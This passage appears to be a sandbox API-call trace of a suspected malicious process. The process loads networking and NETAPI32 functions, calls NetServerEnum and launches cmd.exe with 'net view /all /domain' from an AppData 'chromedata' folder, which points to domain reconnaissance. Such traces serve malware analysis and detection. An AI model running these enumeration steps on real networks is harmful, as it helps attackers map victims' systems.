	[0240.303] ResetEvent (hEvent=0x8) returned 1
	[0240.303] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.305] GetProcAddress (hModule=0x76f80000, lpProcName="wcslen") returned 0x76f9d335
	[0240.305] ResetEvent (hEvent=0x8) returned 1
	[0240.305] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.307] LoadLibraryW (lpLibFileName="NETAPI32.dll") returned 0x73c20000
	[0240.321] ResetEvent (hEvent=0x8) returned 1
	[0240.321] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.323] GetProcAddress (hModule=0x73c20000, lpProcName="NetApiBufferFree") returned 0x73c113d2
	[0240.323] ResetEvent (hEvent=0x8) returned 1
	[0240.323] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.325] GetProcAddress (hModule=0x73c20000, lpProcName="NetServerEnum") returned 0x6f692f61
	[0240.326] ResetEvent (hEvent=0x8) returned 1
	[0240.326] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.328] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x76cd0000
	[0240.330] ResetEvent (hEvent=0x8) returned 1
	[0240.330] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.332] GetProcAddress (hModule=0x76cd0000, lpProcName="CoInitialize") returned 0x76ceb636
	[0240.332] ResetEvent (hEvent=0x8) returned 1
	[0240.332] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.334] GetProcAddress (hModule=0x76cd0000, lpProcName="CoUninitialize") returned 0x76d186d3
	[0240.334] ResetEvent (hEvent=0x8) returned 1
	[0240.334] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.336] GetProcAddress (hModule=0x76cd0000, lpProcName="IIDFromString") returned 0x76ce2ff2
	[0240.336] ResetEvent (hEvent=0x8) returned 1
	[0240.336] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.338] LoadLibraryW (lpLibFileName="OLEAUT32.dll") returned 0x76a60000
	[0240.339] ResetEvent (hEvent=0x8) returned 1
	[0240.339] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.341] GetProcAddress (hModule=0x76a60000, lpProcName="VariantClear") returned 0x76a63eae
	[0240.341] ResetEvent (hEvent=0x8) returned 1
	[0240.341] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.343] LoadLibraryW (lpLibFileName="USER32.dll") returned 0x76c00000
	[0240.343] ResetEvent (hEvent=0x8) returned 1
	[0240.343] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.344] GetProcAddress (hModule=0x76c00000, lpProcName="wvsprintfW") returned 0x76c2407a
	[0240.344] ResetEvent (hEvent=0x8) returned 1
	[0240.344] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.346] LoadLibraryW (lpLibFileName="WS2_32.dll") returned 0x75a90000
	[0240.348] ResetEvent (hEvent=0x8) returned 1
	[0240.348] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.350] GetProcAddress (hModule=0x75a90000, lpProcName="WSAGetLastError") returned 0x75a937ad
	[0240.350] ResetEvent (hEvent=0x8) returned 1
	[0240.350] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.352] GetProcAddress (hModule=0x75a90000, lpProcName="WSAStartup") returned 0x75a93ab2
	[0240.352] ResetEvent (hEvent=0x8) returned 1
	[0240.352] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.354] GetProcAddress (hModule=0x75a90000, lpProcName="__WSAFDIsSet") returned 0x75a96a8a
	[0240.354] ResetEvent (hEvent=0x8) returned 1
	[0240.354] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.356] GetProcAddress (hModule=0x75a90000, lpProcName="closesocket") returned 0x75a93918
	[0240.356] ResetEvent (hEvent=0x8) returned 1
	[0240.356] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.357] GetProcAddress (hModule=0x75a90000, lpProcName="connect") returned 0x75a96bdd
	[0240.357] ResetEvent (hEvent=0x8) returned 1
	[0240.357] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.359] GetProcAddress (hModule=0x75a90000, lpProcName="gethostbyname") returned 0x75aa7673
	[0240.359] ResetEvent (hEvent=0x8) returned 1
	[0240.359] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.361] GetProcAddress (hModule=0x75a90000, lpProcName="htons") returned 0x75a92d8b
	[0240.361] ResetEvent (hEvent=0x8) returned 1
	[0240.361] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.363] GetProcAddress (hModule=0x75a90000, lpProcName="inet_addr") returned 0x75a9311b
	[0240.363] ResetEvent (hEvent=0x8) returned 1
	[0240.363] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.365] GetProcAddress (hModule=0x75a90000, lpProcName="inet_ntoa") returned 0x75a9b131
	[0240.365] ResetEvent (hEvent=0x8) returned 1
	[0240.365] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.367] GetProcAddress (hModule=0x75a90000, lpProcName="ioctlsocket") returned 0x75a93084
	[0240.367] ResetEvent (hEvent=0x8) returned 1
	[0240.367] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.369] GetProcAddress (hModule=0x75a90000, lpProcName="recv") returned 0x75a96b0e
	[0240.369] ResetEvent (hEvent=0x8) returned 1
	[0240.369] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.370] GetProcAddress (hModule=0x75a90000, lpProcName="select") returned 0x75a96989
	[0240.371] ResetEvent (hEvent=0x8) returned 1
	[0240.371] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.372] GetProcAddress (hModule=0x75a90000, lpProcName="send") returned 0x75a96f01
	[0240.372] ResetEvent (hEvent=0x8) returned 1
	[0240.372] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.374] GetProcAddress (hModule=0x75a90000, lpProcName="setsockopt") returned 0x75a941b6
	[0240.374] ResetEvent (hEvent=0x8) returned 1
	[0240.374] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.376] GetProcAddress (hModule=0x75a90000, lpProcName="socket") returned 0x75a93eb8
	[0240.376] ResetEvent (hEvent=0x8) returned 1
	[0240.376] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.380] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xaf9d0 | out: lpSystemTimeAsFileTime=0xaf9d0*(dwLowDateTime=0x76f97240, dwHighDateTime=0x1d50a6a)) 
	[0240.380] GetCurrentProcessId () returned 0x748
	[0240.380] GetCurrentThreadId () returned 0xe20
	[0240.380] GetTickCount () returned 0xa921a6
	[0240.380] QueryPerformanceCounter (in: lpPerformanceCount=0xaf9d8 | out: lpPerformanceCount=0xaf9d8*=31421778633) returned 1
	[0240.380] malloc (_Size=0x80) returned 0x422600
	[0240.380] __dllonexit () returned 0x6cd414a0
	[0240.380] __dllonexit () returned 0x6cd43790
	[0240.380] ResetEvent (hEvent=0x8) returned 1
	[0240.380] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.382] ResetEvent (hEvent=0x8) returned 1
	[0240.382] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.384] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x6cd43390, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0xaf9d4 | out: lpThreadId=0xaf9d4*=0xe28) returned 0x90
	[0240.385] ResetEvent (hEvent=0x8) returned 1
	[0240.385] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) 

Thread:
	id = 352
	os_tid = 0xe28

	[0240.428] GetEnvironmentVariableA (in: lpName="SystemRoot", lpBuffer=0xb5f68c, nSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa
	[0240.428] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0xb5f790 | out: lpWSAData=0xb5f790) returned 0
	[0240.435] CoInitialize (pvReserved=0x0) returned 0x0
	[0240.441] _errno () returned 0x422690
	[0240.441] getenv (_VarName="PRINTF_EXPONENT_DIGITS") returned 0x0
	[0240.441] GetModuleHandleW (lpModuleName="msvcrt.dll") returned 0x76f80000
	[0240.441] GetProcAddress (hModule=0x76f80000, lpProcName="_get_output_format") returned 0x76ff5cb8
	[0240.475] _get_output_format () returned 0x0
	[0240.475] strlen (_Str="C:\\Windows") returned 0xa
	[0240.476] SetCurrentDirectoryA (lpPathName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 1
	[0240.476] NetServerEnum (servername=0x0, level=0x65, bufptr=0xb5f4fc, prefmaxlen=0xffffffff, entriesread=0xb5f500, totalentries=0xb5f504, servertype=0x1000, domain=0x0, resume_handle=0xb5f508) 

Thread:
	id = 353
	os_tid = 0xe2c


Process:
	id = "54"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x7ee17480"
	os_pid = "0xd70"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "40"
	os_parent_pid = "0xa70"
	cmd_line = "/c net view /all /domain"
	cur_dir = "C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 365
	os_tid = 0xda4

	[0249.383] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2bfa70 | out: lpSystemTimeAsFileTime=0x2bfa70*(dwLowDateTime=0x7c594d00, dwHighDateTime=0x1d50a6a)) 
	[0249.383] GetCurrentProcessId () returned 0xd70
	[0249.383] GetCurrentThreadId () returned 0xda4
	[0249.383] GetTickCount () returned 0xa944df
	[0249.383] QueryPerformanceCounter (in: lpPerformanceCount=0x2bfa68 | out: lpPerformanceCount=0x2bfa68*=32322151602) returned 1
	[0249.384] GetModuleHandleA (lpModuleName=0x0) returned 0x49df0000
	[0249.384] __set_app_type (_Type=0x1) 
	[0249.384] __p__fmode () returned 0x770231f4
	[0249.384] __p__commode () returned 0x770231fc
	[0249.384] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e121a6) returned 0x0
	[0249.384] __getmainargs (in: _Argc=0x49e14238, _Argv=0x49e14240, _Env=0x49e1423c, _DoWildCard=0, _StartInfo=0x49e14140 | out: _Argc=0x49e14238, _Argv=0x49e14240, _Env=0x49e1423c) returned 0
	[0249.384] GetCurrentThreadId () returned 0xda4
	[0249.385] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xda4) returned 0x38
	[0249.385] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0249.385] GetProcAddress (hModule=0x76b10000, lpProcName="SetThreadUILanguage") returned 0x76b624c2
	[0249.385] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0249.385] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0249.385] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2bfa00 | out: phkResult=0x2bfa00*=0x0) returned 0x2
	[0249.385] VirtualQuery (in: lpAddress=0x2bfa37, lpBuffer=0x2bf9d0, dwLength=0x1c | out: lpBuffer=0x2bf9d0*(BaseAddress=0x2bf000, AllocationBase=0x1c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0249.385] VirtualQuery (in: lpAddress=0x1c0000, lpBuffer=0x2bf9d0, dwLength=0x1c | out: lpBuffer=0x2bf9d0*(BaseAddress=0x1c0000, AllocationBase=0x1c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c
	[0249.385] VirtualQuery (in: lpAddress=0x1c1000, lpBuffer=0x2bf9d0, dwLength=0x1c | out: lpBuffer=0x2bf9d0*(BaseAddress=0x1c1000, AllocationBase=0x1c0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c
	[0249.385] VirtualQuery (in: lpAddress=0x1c3000, lpBuffer=0x2bf9d0, dwLength=0x1c | out: lpBuffer=0x2bf9d0*(BaseAddress=0x1c3000, AllocationBase=0x1c0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0249.385] VirtualQuery (in: lpAddress=0x2c0000, lpBuffer=0x2bf9d0, dwLength=0x1c | out: lpBuffer=0x2bf9d0*(BaseAddress=0x2c0000, AllocationBase=0x2c0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c
	[0249.385] GetConsoleOutputCP () returned 0x1b5
	[0249.385] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e14260 | out: lpCPInfo=0x49e14260) returned 1
	[0249.385] SetConsoleCtrlHandler (HandlerRoutine=0x49e0e72a, Add=1) returned 1
	[0249.385] _get_osfhandle (_FileHandle=1) returned 0x14c
	[0249.385] SetConsoleMode (hConsoleHandle=0x14c, dwMode=0x0) returned 0
	[0249.386] _get_osfhandle (_FileHandle=1) returned 0x14c
	[0249.386] GetConsoleMode (in: hConsoleHandle=0x14c, lpMode=0x49e141ac | out: lpMode=0x49e141ac) returned 0
	[0249.386] _get_osfhandle (_FileHandle=0) returned 0x158
	[0249.386] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0x49e141b0 | out: lpMode=0x49e141b0) returned 0
	[0249.386] GetEnvironmentStringsW () returned 0x4b01d0*
	[0249.386] GetProcessHeap () returned 0x4a0000
	[0249.386] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x8fa) returned 0x4b0ad8
	[0249.386] FreeEnvironmentStringsW (penv=0x4b01d0) returned 1
	[0249.386] GetProcessHeap () returned 0x4a0000
	[0249.386] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x4) returned 0x4b0050
	[0249.386] GetEnvironmentStringsW () returned 0x4b01d0*
	[0249.386] GetProcessHeap () returned 0x4a0000
	[0249.386] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x8fa) returned 0x4b13e0
	[0249.386] FreeEnvironmentStringsW (penv=0x4b01d0) returned 1
	[0249.386] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2be970 | out: phkResult=0x2be970*=0x40) returned 0x0
	[0249.386] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2be978, lpData=0x2be97c, lpcbData=0x2be974*=0x1000 | out: lpType=0x2be978*=0x0, lpData=0x2be97c*=0xe8, lpcbData=0x2be974*=0x1000) returned 0x2
	[0249.386] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2be978, lpData=0x2be97c, lpcbData=0x2be974*=0x1000 | out: lpType=0x2be978*=0x4, lpData=0x2be97c*=0x1, lpcbData=0x2be974*=0x4) returned 0x0
	[0249.386] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2be978, lpData=0x2be97c, lpcbData=0x2be974*=0x1000 | out: lpType=0x2be978*=0x0, lpData=0x2be97c*=0x1, lpcbData=0x2be974*=0x1000) returned 0x2
	[0249.386] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2be978, lpData=0x2be97c, lpcbData=0x2be974*=0x1000 | out: lpType=0x2be978*=0x4, lpData=0x2be97c*=0x0, lpcbData=0x2be974*=0x4) returned 0x0
	[0249.386] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2be978, lpData=0x2be97c, lpcbData=0x2be974*=0x1000 | out: lpType=0x2be978*=0x4, lpData=0x2be97c*=0x40, lpcbData=0x2be974*=0x4) returned 0x0
	[0249.386] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2be978, lpData=0x2be97c, lpcbData=0x2be974*=0x1000 | out: lpType=0x2be978*=0x4, lpData=0x2be97c*=0x40, lpcbData=0x2be974*=0x4) returned 0x0
	[0249.387] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2be978, lpData=0x2be97c, lpcbData=0x2be974*=0x1000 | out: lpType=0x2be978*=0x0, lpData=0x2be97c*=0x40, lpcbData=0x2be974*=0x1000) returned 0x2
	[0249.387] RegCloseKey (hKey=0x40) returned 0x0
	[0249.387] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2be970 | out: phkResult=0x2be970*=0x40) returned 0x0
	[0249.387] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2be978, lpData=0x2be97c, lpcbData=0x2be974*=0x1000 | out: lpType=0x2be978*=0x0, lpData=0x2be97c*=0x40, lpcbData=0x2be974*=0x1000) returned 0x2
	[0249.387] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2be978, lpData=0x2be97c, lpcbData=0x2be974*=0x1000 | out: lpType=0x2be978*=0x4, lpData=0x2be97c*=0x1, lpcbData=0x2be974*=0x4) returned 0x0
	[0249.387] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2be978, lpData=0x2be97c, lpcbData=0x2be974*=0x1000 | out: lpType=0x2be978*=0x0, lpData=0x2be97c*=0x1, lpcbData=0x2be974*=0x1000) returned 0x2
	[0249.387] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2be978, lpData=0x2be97c, lpcbData=0x2be974*=0x1000 | out: lpType=0x2be978*=0x4, lpData=0x2be97c*=0x0, lpcbData=0x2be974*=0x4) returned 0x0
	[0249.387] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2be978, lpData=0x2be97c, lpcbData=0x2be974*=0x1000 | out: lpType=0x2be978*=0x4, lpData=0x2be97c*=0x9, lpcbData=0x2be974*=0x4) returned 0x0
	[0249.387] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2be978, lpData=0x2be97c, lpcbData=0x2be974*=0x1000 | out: lpType=0x2be978*=0x4, lpData=0x2be97c*=0x9, lpcbData=0x2be974*=0x4) returned 0x0
	[0249.387] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2be978, lpData=0x2be97c, lpcbData=0x2be974*=0x1000 | out: lpType=0x2be978*=0x0, lpData=0x2be97c*=0x9, lpcbData=0x2be974*=0x1000) returned 0x2
	[0249.387] RegCloseKey (hKey=0x40) returned 0x0
	[0249.387] time (in: timer=0x0 | out: timer=0x0) returned 0x5cdadff6
	[0249.387] srand (_Seed=0x5cdadff6) 
	[0249.387] GetCommandLineW () returned="/c net view /all /domain"
	[0249.387] GetCommandLineW () returned="/c net view /all /domain"
	[0249.387] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e15260 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata") returned 0x30
	[0249.387] GetProcessHeap () returned 0x4a0000
	[0249.387] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x210) returned 0x4b1ce8
	[0249.387] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4b1cf0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0249.388] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e20640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0249.388] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e20640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0249.388] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e20640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0249.388] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0249.388] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0249.388] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0249.388] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0249.388] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0249.388] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0249.388] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0249.388] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0249.388] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0249.388] GetProcessHeap () returned 0x4a0000
	[0249.388] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b0ad8 | out: hHeap=0x4a0000) returned 1
	[0249.388] GetEnvironmentStringsW () returned 0x4b01d0*
	[0249.388] GetProcessHeap () returned 0x4a0000
	[0249.388] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x912) returned 0x4b2820
	[0249.388] FreeEnvironmentStringsW (penv=0x4b01d0) returned 1
	[0249.388] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e20640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0249.388] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e20640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0249.388] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0249.388] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0249.388] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0249.388] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0249.388] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0249.388] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0249.388] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0249.388] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0249.388] GetProcessHeap () returned 0x4a0000
	[0249.388] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x6a) returned 0x4a07f0
	[0249.388] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2bf73c | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata") returned 0x30
	[0249.389] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", nBufferLength=0x104, lpBuffer=0x2bf73c, lpFilePart=0x2bf738 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", lpFilePart=0x2bf738*="chromedata") returned 0x30
	[0249.389] GetFileAttributesW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata")) returned 0x2010
	[0249.389] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2bf4b8 | out: lpFindFileData=0x2bf4b8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xc16c9120, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xc16c9120, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x4b0060
	[0249.389] FindClose (in: hFindFile=0x4b0060 | out: hFindFile=0x4b0060) returned 1
	[0249.389] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc", lpFindFileData=0x2bf4b8 | out: lpFindFileData=0x2bf4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc16c9120, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xc1c966c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xc1c966c0, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2XC7u663GxWc", cAlternateFileName="2XC7U6~1")) returned 0x4b0060
	[0249.389] FindClose (in: hFindFile=0x4b0060 | out: hFindFile=0x4b0060) returned 1
	[0249.389] _wcsnicmp (_String1="2XC7U6~1", _String2="2XC7u663GxWc", _MaxCount=0xc) returned 72
	[0249.389] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData", lpFindFileData=0x2bf4b8 | out: lpFindFileData=0x2bf4b8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xc17153e0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xc173b540, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7b4de3da, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x4b0060
	[0249.389] FindClose (in: hFindFile=0x4b0060 | out: hFindFile=0x4b0060) returned 1
